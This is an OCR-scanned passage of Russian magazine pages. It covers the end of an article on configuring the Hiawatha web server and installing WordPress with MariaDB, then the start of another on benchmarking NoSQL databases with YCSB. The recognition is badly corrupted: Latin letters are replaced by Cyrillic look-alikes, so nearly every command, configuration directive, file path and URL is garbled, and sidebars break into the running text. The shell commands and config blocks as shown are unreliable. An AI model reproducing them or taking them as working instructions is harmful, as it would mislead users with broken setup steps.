Она определ^ет лог-фаил, в которыи будут сыпатвс^ все сообидени^ о неправилвно 
сформированных НТТР-запросах, мусорных 11Р1_, попытках применени^ Х55 и подоб- 
ном. С помоидыо НЈамаШа такукз активноств можно не толвко регистрироватв и анали- 
зироватв, но и предотвраидатв. Дл^ әтого суидествует следукзидии набор отдии: 

# Бан клиентовЈ отправллкндих неправилвныи НТТР-запрос (400 ВасЈ Кедие^т.) 
ВапОпСагһа§е = 300 

# Бан клиентовЈ превышакндих максималвное количество одновременных запросов 
Вап0пМахРе г1Р = 60 

# БәНј клиентовЈ отправллкндих слишком длинныи НТТР-запрос 

# (413 Кедие5Т ЕптЈту Тоо 1_аг§е) 
ВапОпМахКедБЈге = 300 

# Закрыватв все осталвные соединенил клиентовЈ попавших в бан 
К1ск0пВап = уе5 

# Продллтв времл бана при попытках клиента установитв соединениеЈ находлсв 

# в бане 

Кеһап0иг1п§Вап = уе5 

# Бан при неудачнои попытке логина 
Вап0п1л1гоп§Ра55ыог с1 = 3:120 

# Бан клиентовЈ запрашивакпдих неправилһныи 1ЈК- 
Вап0п1пуаПсШК - = 60 

# Бан клиентовЈ отправллкндих болыле деслти запросов за секунду 
Вап0пҒ1оосИп§ = 10/1:15 

Такие настроики позвол^кгг предотвратитв некоторые типы простых Оо5-атак и от- 
битв ботов, но они бесполезны противХ55 и 501 тјесИоп. Позтому в конфиге НЈамаШа 
предусмотрено еиде четыре отдии: 



Ргеуеп1:С5КҒ^=^уе5 
Ргеуепт_5Сј1 Л = уе5 
ВапОпБОИ = 60 



Ргеуеп1:Х55 = уе5 

Перва^ представл^ет собои простои метод заидиты от С5ВҒ с помоидыо игнорирова- 
ни^ всех кукисов браузера при заходе по ссылке с другого саита. Заидитит от некото- 
рых типов ботов, но не дает стопрои,ентнои гарантии. Втора^ и третыз — зто заидита 
от 50Ы с помоидыо звристических методов анализа Четверта^ — борвба с Х55 
с помоидыо замены символов <, > и кавычек в на подчеркивани^. Ни один из них 
не безопасен на 100%, и каждыи должен примен^тыз^ с осторожностыо. 
Настроики Ғаз1:СӨ1 в конфиге определ^кзтс^ примерно так: 

СС1һапс11ег = /и зг/Ып/рег! : р! 
СС1һапс11ег ^_/и5г/Ып/рһр-с§1 : рһр 
СС1һапс11 ег = /изг /Ып/русһоп : ру 
СС1һапс11 ег = /изг/Ып /гиһу : гр 
СС1һапс11ег ^^/и5г/Ып/551-с§1 ^5һ±т1 
СОЛех^сеп^^оп = с§ ј 
1г1§§ег0пСС151:а1:и5 = уе5 
Ға5"сСС15егүег^^ 

Ға51:С61 Јс1 = РНР5 

Соппес-сТо = 127.Ө.Ө.1:9ӨӨӨ 

Ех"сеп5Јоп = рһр 
^е5510пТ1шеои1: = 30 

} 

Здесв все просто. Сначалауказывакзтс^ расширени^ фаилов, которые могут выпол- 
н^тв функ1дии СӨ1-скриптов, затем определ^етс^ один из Ғаз1:СӨ1-серверов с именем 
РНР5 (оно нужно дгт последукзидеи прив^зки к виртуалвному хосту), располагакз- 
идиис^ по адресу 127.0.0.1:9000. Поумолчаникз НЈамаШа запускает все СӨ1-скрипты 
с помоидыо приложени^ сдј-\л/гаррег, которое работает под другим 1Ш и позвол^ет 
заидититв сервер от проникновени^ с помоидыо әксплуатаи,ии дыр в скриптах. Врап- 
пер можно легко изменитв с помоидыо отдии СӨ1\л/гаррег. 

Врем^ исполнени^ скриптов строго лимитировано и по умолчаникз составл^ет 
п^твсекунд. Если скриптнеуспеваетзакончитвработузазто врем^, он м^гкоумерид- 
вл^етс^ с помоидыо сигналаТЕВМ, а через секунду убиваетс^ с помоидыо К11_1_. Такое 
поведение сервера можно контролироватв с помоидыо двух отдии: 

# Времл исполненил скрипта 
ТЈшеҒогСС! = < времл> 

# Убииство техЈ кто срывает дедлаин 
К111Т_тес1ои1:С_1 = уез | по 

Дл^ настроики виртуалвных хостов исполызукзтс^ следукзидие 
синтаксические конструки,ии: 

У_г1:иа1Но5*: { 

Но5"спаше = ^1е5.ехатр1е.сот 

ТМҒП 




1лЈеһ51т.еКоот. = / уаг/шмл//ехатр1е . сот/тИе^/риоПс 
Ассе551_о§1п1 е = /уаг/ ы№л//ехатр1е . сот/1п1е5/+-^ 
1о§1п1е5/ассе55 . 1о§ 

Егг ог1_о§1п1е = /уаг/шмл//ехатр1е. сот/1п1е5/<-' 
1о§1п1е5/е ггог. 1 о& 
5һош1пс1ех = уе5 



УЈгсиа1Но5т. { 

Но5"спате = ыыы.ехатр1е. сот^ *.ехатр1е.сот 
1лЈео51"сеКоот. = /у аг/шмл//ехатр1е . сот/ыыы/ри ЫЈс 
5"сагт.Ғ11е = ЈпсЈех. рһр 

Ассе551_о§1п1 е = /уаг/ы ыы/ехатр!е . сот/ыыы /^ 
^и>§1п1е5/ассе55 . 1о§ 
Еггог1_ о§1п1е = / уаг/ыыы/ехатр!е. сот/ыыы/<-< 
1о§1п1е5/е ггог. 1 о§ 
ТЈтеҒогС.6 1 = 10 
У5еҒа51:С61 = РНР5 
115еТоо1кИ: = оап^һее 

} 

Әто определение двуххостов. Первыи предназначен дл^ хранени^ публично доступ- 
ныхфаилов, располагакзидихс^ в каталоге /уаг/\ллллл//ехатр1е.сот/ТЈ1е5/риЫЈс. Клиен- 
ты могут как запрашиватв фаилы по отделвности (в виде ссылки со странии,ы), так 
и получитв их список; за әто отвечает ошдил 5һо\л/1пс1ех = уез. Второи предназначен 
дл^ хранени^ динамического веб-саита, написанного на РНР. Дл^ запуска скриптов 
он исполвзует описанныи выше Ғазт_СӨ1-сервер с именем РНР5 и устанавливает свои 
собственныи таим-аут на исполнени^ СӨ1-скриптов. 

Второи хост также исполвзует отдикз 115еТоо1кгг., котора^ определ^ет набор пра- 
вил, исполвзуемых дгт 11В1_-рераитинга, перенаправлени^ и запрета 11В1_-адресов. 
В данном случае исполызуетс^ набор правил под названием оапзһее, которыи дол- 
жен бытв определен где-то выше. Выггтдетв он можеттак: 

1Јг1Тоо1к Јт. { 

# Имл данного набора правил 
Тоо1кЈ т.1Р = оап5һее 

# Если запрашиваемыи фаил еств на диске - оставллем 1)К1. как еств 
Ке^ие5т.1Ш 151п1е Кет.игп 

# Если фаил статическии - не трогаем 1)К1. 

Мат.сһ л /(с55 |1п1е5 1 1та§е5 | Ј5 | 5Нт5т.ат.) ($ | /) Кет.игп 

# Если зто один из следукидих фаилов - не трогаем 
Мат.сһ л /(-ҒауЈсоп . Јсо | гооот.5 ."схт. | 51т.етар.хт1)$ Кет.игп 

# Все 11К1.Ј содержашие параметрыЈ перенаправлаем на Јпс1ех.рһр 
Ма-ссһ ,*\?(.* ) Кеы гј-се /ЈпсЈех. рһр? $1 

# Все осталычые запросы перенаправлием на Јпс1ех.рһр 
Ма т.сһ .* Кемг1т.е /1пс1ех.рһр 



НЈашЈһаподдержи- 
ваетопределение 
изег-сЈеппес! настроек 
дл^ каждого каталога. 
Дл^ зтого достаточно 
создатв в катало- 
гефаил .ЫашЈһас 
определением нужных 
настроек. Возможные 
опи,ии: АссеззЫз!, 
АИегОгоир, АИегЫз!, 
АИегМосЈе, ЕггогНапс11ег, 
1_одтМе55аде, 
РаззмогсЈҒНе, 
РедшгесЈСгоир, 5е1еп^, 
5һо\л/1пс1ех, 31аг1ҒИеи 

ОзеСШе. 
Если применлтвопиии 

зашиты отугроз, не 
исполвзул соответству- 
к)1Диеопи,иидл^бана 
злоумышленников, 
возможноств Оо5-атаки 
останетс^. 



Стоит отметитв, что НЈа\л/а1:һа поддерживает доволыно гибкие правила филыраиии 
которыхбудет достаточно в 99% случаев. Все они описаны в плап-страниие сер- 
вера и будут знакомы всем, кто когда-то занималс^ написанием правил дл^ других 
веб-серверов. После окончани^ редактировани^ конфига сервер необходимо пере- 
запуститв: 

$ зисЈо 5 у5±етс±1 ге5±а гс Һ Јашасһа # Агсһ 
$ 5ис1о /етс/јпј-с.сј/һјашатһа 5±а гс # 11һип1:и 

ПРАКТИЧЕСКИИ ПРИМЕР: ОТОПОРПЕЗЗ 

Чтобы проверитв работу НЈа\л/а1:һа в реалвныхуслови^х, попробуем исполвзоватв его 
дл^ создани^ веб-саита на\Л/огс!Рге55 и МапаОВ под (ЈоипШ 13.10. Ставим и запуска- 
ем НЈамаШа, как описано в начале статви, затем ставим РНР: 

$ 5ис!о а рт-^е т Јп ^таИ рһр5 рһр-реаг рһр5 -сиг! рһр5- шу5д1 рһр5--Ғрш 

Далее подклкзчаем репозитории МапаОВ и устанавливаем базу данных: 

$ 5исЈо а рт-^ ет Јп5"са11 5 0-Ғ1:шаге-ргорег1:Је5-соттоп 
$ 5ис!о арс-кеу ас1у --гесу-ке у5 -- кеу^е гуег <- 

һкр : //кеу^егуег . иһиггси . сот : 80 ӨхсһсһӨ82а1һһ943с1һ 
$^ис1о ас1с1-ар1:-геро511:огу "с1ео һсср: //тп.ггог.4- 1 ^ 

■Ытеыеһ . ги/тагЈасЈҺ/геро /5. 5 /иһигг си 5аису таЈп' 
$^ис1о арс-^ес ирс1асе 

$ 5исЈо а рс-§ес 1П5"са11 таг1ас1һ-5егүег ту5д1-с1Је ггс 

Вносим стандартные правки в конфиг /е1:с/рһр5/Трт/рһр.ЈпЈ. Ничего особенного: 
вклкзчение сжати^ данных и базовые настроики безопасности. 

21Јһ. оисрис_сотрге55Јо п = Оп 
гИҺ^ о ис р ис_с отр г е 5 5 10 п_1 е уе 1 
ехро5е_рһр = 0-Ғ-Ғ 
с115р1ау_еггог5 = 0-Ғ-Ғ 

аИо ы иг1 п.пс1ис1е = 0-Ғ-Ғ 



Открываем конфиг РНР-ҒРМ и добавл^ем строки, необходимые дгт работы в св^зке 
с НЈамаШа. В нашеи конфигураиии Ғаз1:СӨ1-сервер будет обидатвс^ с веб-сервером, 
исполвзу^ 11Ы1Х-сокет вместо сетевого соединени^. 

[ыыы] 

и5ег = м лм-сЈата 
§гоир = млм-сЈата 

1Ј5сеп = /уаг/ 1Јр/ҺЈашатһа/рһр5--Ғс§ј . 50ск 
рт = 5сасЈс 
рт.тах_сһЈ1с1геп = 3 



СП01Г = / 

Теперв создаем конфиг НЈа\л/а1:һа, удалив содержимое уже имекзидегос^: 

5егуег1с1 = ыыы-с1а"са 
Соппес"сЈоп5То"са 1 = 2 50 
Соппес"СЈоп5Р ег1Р = 25 

5у5"сеш1о§1п1е^^/үаг/1о§/һ1ама"сһа/5у5"сет. 1о§ 
Сагһа§е1о§1п1е = /үаг/1о§/һ1аыа1:һа/§агһа§е . 1о§ 

В1ПС11П§ ј{_ 

Ро г-с = 80 

Ј 

СС1һапс11ег^^/и5г/Ып/рһр5-с§1 : рһр, рһр5 
Ға5сСС15егүег^^ 
Ға5сСС1 Јс1 = РНР5 

Соппесс То = /у аг/1ЈҺ/ҺЈаыасһа/рһр5--Ғс§Ј . 50ск 

Ех1:еп5Јоп = р һ р 

} 

1Јг1Тоо1кЈт { 

Тоо1к Ј1:1Р = ыогс1рге55 

Ке^ие5"с1Ш ех15С5 Кет игп 

Ма -ссһ . * \ ? ( .*) Кеыгј-се ДпсЈех. р һр?$1 

Ма тсһ .* Кеыг1се /п.пс1ех.рһр 

1 

УЈг1: иа1Но 5Т { 

Но5"спате = ыыы. ехатр1е. сот 
1лЈеһ51"сеКоо"с = /у аг/ыыы/ыогс!рге55 
5"сагсҒИе = ЈпсЈех. рһр 

Ассе551_о§1п1е = /уаг/ыыы/ыогс1рге55/1о§/ассе55 . 1о§ 
Еггог1_о §1п1е = /уаг/ыыы/ыогс1рге55/1о§/еггог . 1о§ 
и5еҒа5±С0 1 = РНР5 
1)5еТоо1кЈ 1: = ыогсЈрге55 

1 

Конфиг простои и должен бытв пон^тен после прочтени^ предыдуидих разделов. 
При необходимости его можно дополнитв ошдилми безопасности. Далее скачиваем 
последнкжз версикз^Л/огсЈРгезз и разворачиваем в каталог /уаг/\ллллл//\л/огс1рге55: 

$ 5ис!о -5 

$ с сЈ /у аг/млм 

$ ы§ет һирх//ыогс1рге5 5 . ог§/1аге51: . 21р 

$ иш1р 1асе 51: . 2Јр 

$ сһоып -К ыыы-сЈата ыогс1рге55 

$ ехгс^ 

Создаем базу данных дп^ \Д/огс!Рге55. МапаОВ совместима с Му501_, так что сделатв 
әто можно с помоидыо стандартного клиента: 



$ зибо ту5^1 -и го о1: -р 
СКЕ АТЕ Р АТАВА5Е ыр 5; 

Запускаем НЈа\л/аШа и РНР-ҒРМ: 

$ 5исЈо 5 егујсе Һ1аыа1:һа 5±а гЕ 
$ 5ис!о 5 егујсе рһр5--Ғрт ге5"Еаг± 

Әто все. Теперв можно заити на саит дгт проверки его работоспособности. 
ВМЕСТО ВЫВОДОВ 

НЈамаШа — әто такои веб-сервер дл^ ленивых. Он прост в настроике и содержит 
в себе набор средств дгт противодеистви^ простым видам атак, заидита от которых 
обычно должна располагатвс^ либо уровнем ниже (РНР-скрипты), либо уровнем 
выше (фаирвол и система обнаружени^ вторжении). Әто оченв легкии веб-сервер, 
которыи хорошо подоидет дл^ запуска личного блога, но п не уверен, что его приме- 
нение сколвко-нибудв иелесообразно на болвшом веб-саите. I 



ЗҮЫ/АСК 




Скороств 
решает 



ТЕСТИРУЕМ 

ПРОИЗВОДИТЕЛВНОСТҺ 
N0501 БД *' Ш У*2 



За счет чего достигаетс^ скороств в Ыо501_? В первукз очередв, әто следствие 
совсем другои парадигмы хранени^ данных. Парсинг и трансл^|дил 301_-за- 
просов, работа оптимизатора, обБединение таблии, и прочее силвно уве- 
личивакзт врем^ ответа. Если вз^тв и выкинутв все әти слои, упроститв за- 
просы, читатв с диска пр^мо в сетв или хранитв все данные в оперативнои пам^ти, 
то можно выигратв в скорости. Уменвшаетс^ как врем^ обработки каждого запроса, 
так и количество запросов в секунду. Так по^вилисв кеу-уа1ие БД, самым типичным 
и широко известным представителем которых ^вл^етс^ тетсасһес!. Да, зтот кеш, 
широко примен^емыи в веб-приложени^х дгт ускорени^ доступа к данным, тоже ^в- 
л^етс^ N0501. 




шғо 

КромеҮСЗВ, тестироватвпроиз- 
водителвноств N0501 БД можно 
с помо1дыо, например, ЈМе1ег. 




Офиииалвные резулвтаты әтого 

идругихисследовании: 

Шитһјаск.пеј/ууһјјерарегз 



ТИПЫ N0301 

Можно выделитв четыре основные категории 1Чо501_-систем: 

Клкзч — значение (кеу-уа1ие). Болыиа^ хеш-таблииа, где допустимы толһко опе- 
раиии записи и чтени^ данных по клкзчу. 

Колоночные (со1итп). Таблии,ы, со строками и колонками. Вот толвко в отличие 
от 501 количество колонок от строки к строке может бытв переменным, а об- 
шее число колонок может измер^твс^ миллиардами. Также кажда^ строка имеет 
уникалвныи клкзч. Можно рассматриватв такукз структуру данных как хеш-табли- 
иу хеш-таблииы, первым клкзчом ^вл^етс^ клкзч строки, вторым — им^ колонки. 
При поддержке вторичных индексов возможны выборки по значеникз в колонке, 
а не толвко по клкзчу строки. 

• Документо-ориентированные (с1оситеп1:-опеп1:ес1). Коллекиии структурированных 
документов. Возможна выборка по различным пол^м документа, а также модифи- 
каии^ частеи документа. К зтои же категории можно отнести поисковые движки, 
которые ^вл^кзтс^ индексами, но, как правило, не хран^т сами документы. 
Графовые (дгарһ). Спеииалвно предназначены дгт хранени^ математических 
графов: узлов и св^зеи между ними. Как правило, позвол^кзт задаватв дл^ узлов 
и св^зеи еше и набор произволвных атрибутов и выбиратв узлы и св^зи по әтим 
атрибутам. Поддерживакзт алгоритмы обхода графов и построени^ маршрутов. 
Дгт теста мы вз^ли представителеи первыхтрех категории: 

• Аегозрјке (в девичестве Сһти51еат). Оченв быстра^ кеу-уа1ие БД (а с версии 3.0 — 
еиде и частично документо-ориентированна^). В ^вном виде поддерживает 550, 
исполызует их напр^мукз, без фаиловои системы, как блочные устроиства. Соз- 
даваласв дл^ рынка онлаин-рекламы (в том числе дгт так называемого ҒГГВ — 
Веа1 ТЈпле ВЈсЈсПпд), где требукзтс^ быстрые и болвшие кеши данных. 

• Соисһоазе. Возник как симбиоз проектов СоисһОВ и Меплоазе и ^вл^етс^, та- 



ким образом, последователем тетсасһес!, то еств кеу-уа1ие БД (хот^ оп^тв-таки 
с версии 2.0 по^виласв поддержка Ј50Ы обБектов-документов). От тетсасһес! 
в нем осталисв совместимоств на уровне протокола доступа и стремление все 
хранитв в ОЗУ. Отличаетс^ от плеплсасһес! персистентностыо и кластерностыо, 
әти новые фичи написаны на Епапд. 
• Са55апс!га. Стареиша^ СУБД в списке. Возникла в недрах Ғасеооок и была отпу- 
идена под крылышко Арасһе в 2008 году. ^вл^етс^ колоночно-ориентированнои 
БД, идеиным наследником Өоод1е ВЈдТаЫе. 

МопдоОВ. Весвма известна^ документо-ориентированна^ БД. Пожалуи, родона- 
чалвникжанра документо-ориентированных 1Чо501_ БД. Документы представл^- 
кзтсобои Ј50Ы (точнее, В501Ч) об^екты. Создаваласв дгт нужд веб-приложении. 



Настраиваем 88Р 

В частности, 550 требукзт деиствии, называемых непереводимым словом 
оуегргоујзјопјпд. Дело в том, что в 550 присутствует слои транагти,ии адресов. Адре- 
са блоков, видные операи,ионнои системе, совсем не соответствуктг физическим 
блокам во флеш-пам^ти. Как ты знаешв, число ииклов перезаписи у флеш-пам^ти 
ограничено. К тому же операии^ записи состоит из двух әтапов: стирани^ (часто — 
сразу несколвких блоков) и собственно записи. Поәтому, дгт обеспечени^ долговеч- 
ности накопител^ (равномерного износа) и хорошеи скорости записи, контроллер 
диска чередует физические блоки пам^ти при записи. Когда операиионна^ систе- 
ма пишет блок по какому-то адресу, физически записв происходит на некии чистыи 
свободныи блок пам^ти, а старыи блок помечаетс^ как доступныи дгт последукзиде- 
го (фонового) стирани^. Дл^ всех зтих манипул^иии контроллеру диска нужны сво- 
бодные блоки, чем болвше, тем лучше. Заполненныи на 100% 550 может работатв 
весвма медленно. 

Свободные блоки могут получитвс^ несколвкими способами. Можно с помоидыо 
команды һс!рагт (с клкзчом '-Ы') указатв количество секторов диска, видимых опе- 
раи,ионнои системои. Осталвное будет в полном распор^жении контроллера. Одна- 
ко әто работает не на вс^ком железе (в А\/\/5 ЕС2, например, не работает). Другои 
способ — оставитв не зан^тое разделами место на диске (имекзтс^ в виду разделы, 
создаваемые, например, ТсПзк). Контроллер достаточно умен, чтобы задеиствоватв 
әто место. Третии способ — исполызоватв фаиловые системы и версии ^дра, кото- 
рые умекзт сообидатв контроллеру о свободных блоках. Әто та сама^ команда ТВ1М. 
На нашем железе хватило һс!рагпл, мы отдали на растерзание контроллеру 20% от 
обидего об^ема дисков. 

Дгт 550 важен также планировидик ввода-вывода. Әто така^ подсистема ^дра, 
котора^ группирует и переупор^дочивает операи,ии ввода-вывода (в основном за- 
писи на диск) с и,елыо повыситв әффективноств. По умолчаникз линукс исполызует 
СҒО (Соплр1е1:е1у ҒаЈг Оиешпд), которыи стараетс^ переставитв операи,ии записи так, 
чтобы записатв как можно болвше блоков последователвно. Әто хорошо дгт обыч- 
ных враидакзидихс^ (так и говор^т — зртптд :)) дисков, потому что дл^ них скороств 
линеиного доступа заметно выше доступа к случаиным блокам (головки нужно пере- 

мршаткЛ Нп ппа .^^П пмнрмнаа м пп\/чдмнда чдпмпһ — плмндкТЈРП гчгҺгпрктмрны ^трп- 



ретически), и работаСҒО толвко вноситлишние задержки. Поәтомудгт 550-дисков 
нужно вклкзчатв другие планировидики, например 1ЧООР, которыи просто выполн^- 
ет команды ввода-вывода в том пор^дке, в каком они поступили. Переклкзчитв пла- 
нировидик можно, например, такои командои: «есһо поор > /5у5/Ыоск/5с!а/диеие/ 
5сһес!и1ег», где 5с!а — твои диск. Справедливости ради стоит упом^нутв, что свежие 
^дра сами умекгг определ^тв 550-накопители и вклкзчатв дгт них правилвныи пла- 
нировидик. 

Лкзба^ СУБДлкзбит интенсивно писатв на диск, атакже интенсивно читатв. А Ыпих 
оченв лкзбит делатв геас!-аһеас1, упреждакзидее чтение данных, — в надежде, что, 
раз ты прочитал зтот блок, ты захочешв прочитатв и несколвко следукзидих. Однако 
с СУБД, и особенно при случаином чтении (а зтот как раз наш вариант), зтим наде- 
ждам не суждено сбытвс^. В резулвтате имеем никому не нужное чтение и исполв- 
зование пам^ти. Разработчики МопдоОВ рекомендукгг по возможности уменвшитв 
значение геасЈ-аһеас!. Сделатв әто можно командои «ЫосксЈеу --зеТга 8 /с!еу/5с!а», где 
5с1а — твои диск. 

Лкзба^ СУБД лкзбит открыватв много-много фаилов. Поәтому необходимо замет- 
ноувеличитв лимиты поТПе (количество доступных фаиловых дескрипторов дгт полв- 
зовател^) в фаиле /еТс/зесипТу/ПтһБ.сопТ на значение силыно болвше 4к. 

Также возник интересныи вопрос: как исполвзоватв четыре 550? Если Аегозрјке 
просто подклкзчает их как хранилиида и как-то самосто^телвно чередует доступ к 
дискам, то другие БД подразумевакзт, что у них еств лишв один каталог с данными. 
(В некоторых случа^х можно указатв и несколвко каталогов, но әто не предполагает 
чередовани^ данных между ними.) Пришлосв создаватв РА10 0 (с чередованием) с 
помоидыо утилиты тс!ас!т. ^ полагакз, что можно было бы поигратв с 1_\/М, но произ- 
водители СУБД описывакзт толвко исполвзование тс!ас!т. 



КАК ПРОВОДИЛСЛ ТЕСТ 

В распор^жении у нас было четыре серверных машинки. В каждои: восвми^дерныи 
Хеоп, 32 Гб ОЗУ, четыре интеловских 550 по 120 Гб каждыи. 

Тестировали мы с помоидыоҮС5В (Үаһоо! С1оис! Зеплпд Вепсһплагк). Әто спеи,и- 
алвныи бенчмарк, выпуиденныи командои Үаһоо! Резеагсһ в 2010 году под лии,ензиеи 
Арасһе. Бенчмарк спеи,иалвно создан дгт тестировани^ 1Чо501_ баз данных. И сеи- 
час он остаетс^ единственным и доволвно попул^рным бенчмарком дгт 1Чо501_, фак- 
тически стандартом. Написан, кстати, на Јауа. Мы добавили к оригиналвному ҮС5В 
драивер дгт Аегозрјке, слегка обновили драивер дгт МопдоОВ, а также несколвко 
подшаманили с выводом резулвтатов. 

Дгт создани^ нагрузки на наш маленвкии кластер потребовалосв восемв клиент- 
ских машин. По четырехБ^дерному Ј5 и 4 Гб ОЗУ на каждои. Одного (и двух, и трех, 
и четырех...) клиентов оказалосв недостаточно, чтобы загрузитв кластер. Может по- 
казатвс^ странным, но факт. 

Все әто шевелилосв в однои гигабитнои локалвнои сети. Пожалуи, было бы ин- 
тереснее в дес^тигигабитнои сети, но такого железа у нас не было. Интереснее, по- 
тому что, когда количество операи,ии в секунду начинает измер^твс^ сотн^ми тыс^ч, 
мы утыкаемс^ в сетв. При пропускнои способности в гигабит в секунду (10 л 9 бит/с) 



сетв может пропуститв килобаитных пакетов (~10 л 4 бит) лишв около 100 000 (10 л 5) 
штук. То еств получаем лишв 100к операиии в секунду. А нам вообше-то хотелосв 
получитв миллион :). 

Сетевые карты тоже имекзт значение. Правилвные серверные сетевухи имекзт не- 
сколвко каналов ввода-вывода, соответственно, каждыи с собственным прерывани- 
ем. Вот толвко по умолчаникз в линуксе все әти прерывани^ назначены на одно ^дро 
проиессора. Толвко реб^та из Аегозрјке озаботилисв әтои тонкостыо, и их скрипты 
настроики БД раскидывакзт прерывани^ сетевых карт по ^драм проиессора. Посмо- 
третв прерывани^ сетевых карт и то, как они распределены по ^драм проиессора, 
можно, например, такои командои: «са1: /ргос/т1еггир{5 | дгер еШ». 

Отделвно стоит поговоритв про 550. Мы хотели протестироватв работу 1Чо501_ 
БД именно на твердотелвных накопител^х, чтобы пон^тв, деиствителвно ли зти ди- 
ски того сто^т, то еств дакзт хорошукз производителвноств. Поәтому старалисв на- 
строитв 550 правилвно. Подробнее об әтом можно прочитатв на врезке. 

Естественно, на всех машинах кластера (как серверных, так и клиентских) часы 
должны бытв синхронизированы с помоидыо п1рс1. №рс!а1е тут не годитс^, потому 
что требуетс^ болвша^ точноств синхронизаиии. Дгт всех распределенных систем 
жизненно важно, чтобы врем^ между узлами было синхронизировано. Например, 
Са55апс!га и Аегозрјке хран^т врем^ изменени^ записи. И если на разныхузлах кла- 
стера наидутс^ записи с разным таимстампом, то победитта записв, котора^ новее. 

Сами 1\1о501_ БД настраивалисв следукзшим образом. Браласв конфигураии^ 
из коробки, и примен^лисв все рекомендаиии, описанные в документаиии и каса- 
кзшиес^ достижени^ наиболвшеи производителвности. В сложных случа^х мы св^- 
зывалисв с разработчиками БД. Чаше всего рекомендаиии касалисв подстроек под 
количество ^дер и об^ем ОЗУ. 

Проше всего настраиваетс^ Соисһоазе. У него еств веб-консолв. Достаточно за- 
пуститв сервис на всехузлах кластера. Затем на одном из узлов создатв оиске! («кор- 
зину» дгт клкзчеи-значении) и добавитв другие узлы в кластер. Все через веб-интер- 
феис. Особо хитрых параметров настроики у него нет. 

Аегозрјке и Са55апс!га настраивакзтс^ примерно одинаково. На каждом узле кла- 
стера нужно создатв конфигураиионныи фаил. Әти фаилы почти идентичны дгт каж- 
дого узла. Затем запуститв демонов. Если все хорошо, узлы сами соедин^тс^ в кла- 
стер. Нужно доволвно хорошо разбиратыт в опии^х конфигураиионного фаила. Тут 
оченв важна хороша^ документаии^. 

Сложнее всего с МопдоОВ. У других БД все узлы равнозначны. У Мопдо әто не так. 
Мы хотели поставитв все БД по возможности в одинаковые услови^ и выставитв 
у всех герПса^оп ТасЈог в 2. Әто означает, что в кластере должно бытв две копии дан- 
ных, д/т надежности и скорости. В других БД герИсаИоп Тас1:ог — әто лишв настроика 
хранилиша данных (или «корзины», или «семеиства колонок»). В МопдоОВ количе- 
ство копии данных опредагтетс^ структурои кластера. Грамотно настроитв кластер 
МопдоОВ можно, толвко дважды прочт^ офиииалвнукз документаиикз, посв^шеннук) 
әтому :). Говор^ кратко, нам нужны 5һагс!5 ог герИса-5е1:5. Шарды (ну ты наверн^ка 
слышал термин «шардинг») — әто подмножества всего набора данных, а также узлы 
кластера, где каждое подмножество будет хранитс^. Реплика-сеты — әто термин 
МопдоОВ, обозначакзидии набор узлов кластера, хран^ших одинаковые копии дан- 
ных. В реплика-сете еств главныи узел, которыи выполн^ет операиии записи, и вто- 
оичные үзлы. на котооые осүшествл^етс^ оепликаии^ данных с главного үзла. В слү- 



чае сбоев ролв главного узла может бытв перенесена на другои узел реплика-сета. 
Дгт нашего случа^ (четыре сервера и желание хранитв две копии данных) получает- 
с^, что нам нужно два шарда, каждыи из которых представл^ет собои реплика-сет 
из двух серверов с данными. Кроме того, в каждыи реплика-сет нужно добавитв так 
называемыи арбитр, которыи не хранит данные, а нужен дл^ участи^ в выборах ново- 
го главного узла. Число узлов в реплика-сете дгт правилвных выборов должно бытв 
нечетным. Еиде нужна маленвка^ конфигураиионна^ БД, в которои будет хранитвс^ 
информаии^ о шардах и о том, какие диапазоны данных на каком шарде хран^тс^. 
Технически зто тоже МопдоОВ, толвко (по сравненикз с основными данными) оченв 
маленвка^. Арбитры и конфигураиионнукз БД мы разместили на клиентских маши- 
нах. И еиде на каждом клиенте нужно запуститв демон плопдоз (плопдо з\л/И:сһ), кото- 
рыи будет обрашдтыз^ к конфигураиионнои БД и маршрутизироватв запросы от каж- 
дого клиента между шардами. 

У каждои 1Чо501_ БД свои уникалвныи способ представлени^ данных и допусти- 
мых операиии над ними. Поәтому ҮС5В пошел по пути максималвного обобидени^ 
лкзбых БД (вклкзча^ и 501). 

Набор данных, которыми оперирует ҮС5В, — әто клкзч и значение. Клкзч — әто 
строка, в которукз входит 64-битныи хеш. Таким образом, сам ҮС5В, зна^ обшее ко- 
личество записеи в БД, обраидаетс^ к ним по иелочисленному индексу, а дгт БД мно- 
жество клкзчеи выпгшдит вполне случаиным. Значение — дес^ток полеи случаиных 
бинарных данных. По умолчаникз ҮС5В генерирует записи килобаитного размера, 
но, как ты помнишв, в гигабитнои сети әто ограничивает нас лишв в 100к операиии 
в секунду. Поәтому в тестах мы уменвшили размер однои записи до 100 баит. 

Операи,ии над әтими данными ҮС5В осуидествл^еттоже простеишие: вставка но- 
вои записи с клкзчом и случаиными данными, чтение записи по клкзчу, обновление 
записи по клкзчу. Никаких обБединении таблии, (да и вообше подразумеваетс^ лишв 
одна «таблииа»). Никаких выборок по вторичным клкзчам. Никаких множественных 
выборок по условикз (единственна^ проверка — совпадение первичного клкзча). Әто 
оченв примитивно, но зато может бытв произведено в лкзбои БД. 

Непосредственно перед тестированием БД нужно наполнитв данными. Делаетс^ 
әто самим ҮС5В. По сути, әто нагрузка, состстидаи лишв из операиии вставки. Мы 
әкспериментировали с двум^ наборами данных. Первыи гарантированно помеидает- 
с^ в оперативнукз пам^тв узлов кластера, 50 миллионов записеи, примерно 5 Гб чи- 
стых данных. Второи гарантированно не помеидаетс^ в ОЗУ, 500 миллионов записеи, 
примерно 50 Гб чистых данных. 

Сам тест — выполнение определенного набора операиии — производитс^ под 
нагрузкои разного типа. Важным параметром ^вл^етс^ соотношение операиии — 
сколвко должно бытв чтении, а сколвко обновлении. Мы исполвзовали два типа: ин- 
тенсивна^ записв (Неауу \Л/п{е, 50% чтении и 50% обновлении) и в основном чтение 
(МозИу Веао 1 , 95% чтении и 5% обновлении). Какукз операиикз выполнитв, каждыи 
раз выбираетс^ случаино, проиенты определ^кзт веро^тноств выбора операиии. 

ҮС5В может исполызоватв различные алгоритмы выбора записи (клкзча) дгт вы- 
полнени^ операиии. Әто может бытв равномерное распределение (лкзбои клкзч 
из всего множества данных может бытв выбран с одинаковои веро^тностыо), әкс- 
поненииалвное распределение (клкзчи «в начале» набора данных будут выбиратв- 
с^ значителвно чаше) и некоторые другие. Но типичным распределением команда 



Үаһоо выоралатак называемое 21ртп. сЈто равномерное распределение, в котором, 
однако, отделвные клкзчи (неболвшои проиент от обидего количества клкзчеи) выби- 
ракзтс^ значителвно чаиде, чем другие. Әто симулирует попул^рные записи, скажем 
в блогах. 

